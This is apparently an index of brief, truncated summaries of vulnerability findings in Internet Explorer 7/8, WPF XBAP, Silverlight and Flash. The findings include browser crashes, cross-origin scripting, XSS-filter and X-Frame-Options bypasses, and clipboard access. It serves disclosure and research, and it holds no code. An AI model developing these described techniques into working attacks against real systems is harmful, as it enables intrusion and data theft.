A collection of findings from a security assessment of WPF browser-hosted applications (XBAP). Four distinct issues were identified across DoS, crash, and UXSS categories.

Accessing the CallMethod function on the Silverlight bridge object without arguments or in an unexpected state raises an uncaught exception that crashes the browser.

Setting an invalid URL in event.dataTransfer.setData("URL", ...) during a drag operation crashes IE. The !exploitable analyzer rated this EXPLOITABLE — EIP is changed, and the DEP access violation...

A local HTML file carrying a Mark-of-the-Web (MotW) comment runs in the Internet Zone rather than the Local Machine Zone. Flash files embedded in that page inherit the Internet Zone context, and...

A WPF XBAP (browser-hosted application) running in Internet Explorer could access the system clipboard when it should not have been able to. The compiled clipboard_hijacker.xbap demonstrates reading...

A WPF XAML Hyperlink element with a TargetName can navigate an iframe by name — including iframes belonging to other domains — bypassing the "Allow subframes to navigate across different domains"...

The launchURL method of the Windows Media Player 12 ActiveX object bypasses IE's pop-up blocker on Windows 7. The same method with WMP 11 on XP/Vista did not reproduce, suggesting a regression...

Saving a reference to an iframe's open method in an external popup window, then reloading the main page (destroying the iframe), leaves the cached open callable. Calling it with "about:blank" and...

Saving a reference to an iframe's Image constructor, reloading the iframe (which destroys the original context), and then calling new cachedImage() from the parent crashes IE8 with a...

Caching a reference to an iframe's execScript method, navigating the iframe to a cross-origin page, and then invoking the cached method via Silverlight's ScriptObject.CallMethod bypasses the...

Destroying the Silverlight control (via outerHTML replacement) while the Silverlight update modal dialog is open crashes the browser regardless of how the dialog is closed afterward.

Destroying the Silverlight OBJECT element via outerHTML while the install dialog is present (and the main thread is frozen) crashes the browser. The onMainThreadFrozen helper detects when the main...

Changing the Source property of the Silverlight object when the OnFullScreenChanged event fires crashes the browser. The new source value does not matter — even an empty string is sufficient.

Using the SplashScreenSource parameter with the same .xap file as the source parameter in a Silverlight 3 control triggers a null pointer dereference on load.

Flash's getURL method can navigate frames by name, including frames that belong to other domains. By assigning a name to a cross-origin iframe through JavaScript (which was apparently allowed at the...

Loading a XAML file that uses the insertObject mechanism while an empty iframe is present triggers a crash in IE8.

The IE8 XSS filter skips its checks when the request's referrer is the same domain as the target URL. By injecting a link in the first request that points back to the same vulnerable endpoint — with...

Creating an <object type="text/html"> element with createElement and then storing a reference to that element inside its own document's window keeps the element alive indefinitely — even after the...

IE8's Object.defineProperty can override members that IE's own internal dialogs access on the page's document. When the Print Preview dialog reads document.documentElement, our getter fires — and...

This builds on the delayed-redirect variable injection (entry #23) by using Object.defineProperty to install a getter accessor on a cross-origin window's document object. The accessor persists...

Opening a new window to a same-domain page that performs a server-side redirect to a different domain leaves a window of time during which JavaScript variables set on the new window persist — even...

Setting any property on the prototype of any HTML element type causes IE8 to crash when the File → Properties dialog is opened. The crash can be triggered without user interaction by using ExecWB to...

A script running inside an htmlFile ActiveX document can be made resident simply by storing a reference to the htmlFile object inside its own window. This creates a circular reference that prevents...

A setInterval placed inside a XAML Frame element (loaded via a WebSlice) keeps running even after the WebSlice is closed, because the PresentationHost.exe process remains resident in memory. The...

Loading a page with an X-Frame-Options header inside an iframe and triggering a reload crashes IE8.

Navigating an iframe's location to a page with an X-Frame-Options header via script crashes IE.

Two denial-of-service conditions in IE7 and IE8 triggered through the htmlFile ActiveX object.

This builds on the offsetParent UXSS (entry #16) to reach the res://ieframe.dll zone. Once inside that zone, two things become possible: spoofing the address bar using dnserror.htm#arbitrary-url, and...

I was lucky to find this one. A page with a !DOCTYPE declaration exposes document.all[0] as the DOCTYPE node, and that node's offsetParent is the hosting iframe element — even when that iframe...

Windows Desktop Search opened HTML result pages in a context where navigating location to a local executable path would launch that executable. The fix required restricting the zone or navigation...

This was an early version of a cross-origin technique later superseded by entry #16. The approach loads a non-HTML file (feeds XML, MHT, SWF, XAML, etc.) into an iframe nested inside a cross-origin...

Two approaches bypassed the X-Frame-Options: DENY header in IE8. The first uses a XAML Frame element as the embedding container; the second delays the insertion of an HTML OBJECT element via...

This is the IE8 variation of the _unspecifiedFrame About dialog attack. The IE7 version used a direct window.open to hijack the frame; IE8 blocked that approach, so the method switches to Windows...

While revisiting the cached window.open technique, I found that invoking the stale method twice in quick succession — after it had already been used to navigate the ghost iframe — was enough to crash...

These are two variations of a heap spray technique, exploring different data-binding sources in place of the original XML island. Both bind an iframe's src through the datasrc/datafld mechanism, with...

Loading a feeds-formatted XML file inside an iframe, then overwriting its contents with another iframe via innerHTML, and finally clicking inside the new inner iframe crashes IE8.

This entry is a variation of WinOOB 1053535, archived as a compressed proof-of-concept. The reproduction steps and source were preserved in the zip file rather than as standalone HTML. The core issue...

Calling ExecWB with OLECMDID_GETZOOMRANGE without the required fourth argument (a pointer) crashes IE7.

This one surprised me with how simple the entry point was. IE's About dialog opens a link in a window named _unspecifiedFrame. If an attacker pre-registers that window name, the About dialog's...

A close companion to the InsertImage finding, this one uses the CreateLink execCommand. By placing the focus in a cross-origin iframe and then invoking the command from a same-domain hidden iframe,...

IE's internal dialogs (Find, Print Preview, Properties, etc.) interact with the page's document object — and since JavaScript can override that object and its members, those dialogs end up calling...

This one surprised me. The document.execCommand('InsertImage', true) call, when triggered from an iframe on a different origin, ends up inserting content into the parent document rather than the...

After playing around for a while with non-HTML content in iframes, I noticed that when IE instantiates a WebBrowser control to render something like a Flash file, that WBControl ends up as an...

This one took some time to get right. The trick is keeping a script alive even after the main page navigates away, by caching an execScript reference from an iframe — but the catch is that the cache...

A short one. While exploring what Flash's getURL method would accept as a target, I found that embedding a url:file:/// scheme inside the redirect string caused IE8 to handle the navigation in an...

This was a variation on the earlier IE8 XSS filter bypass, this time using a <meta http-equiv="refresh"> redirect instead of navigating an inner iframe's location property. The filter checked whether...

These proof-of-concepts were written to be pasted into the LiveLabs sandbox environment (an internal IE testing harness at http://131.107.155.233/Samples/genericSample.aspx). The sandbox was supposed...

While testing variations of another bug on IE8, I found two separate crash paths involving window.createPopup() and deferred scripts. Both were straightforward to trigger and required no user...

A quick one. Writing a Flash <object> or <embed> tag into the DOM via innerHTML during the ONKEYPRESS event would crash IE7 if the key was pressed quickly enough — typically two or three rapid...

This was a variation on an MSXML cross-domain scripting bug (MSRC 7930) originally found by Gregory Fleischer, who used XML parameter entities in a DTD to exfiltrate content from a remote URL into a...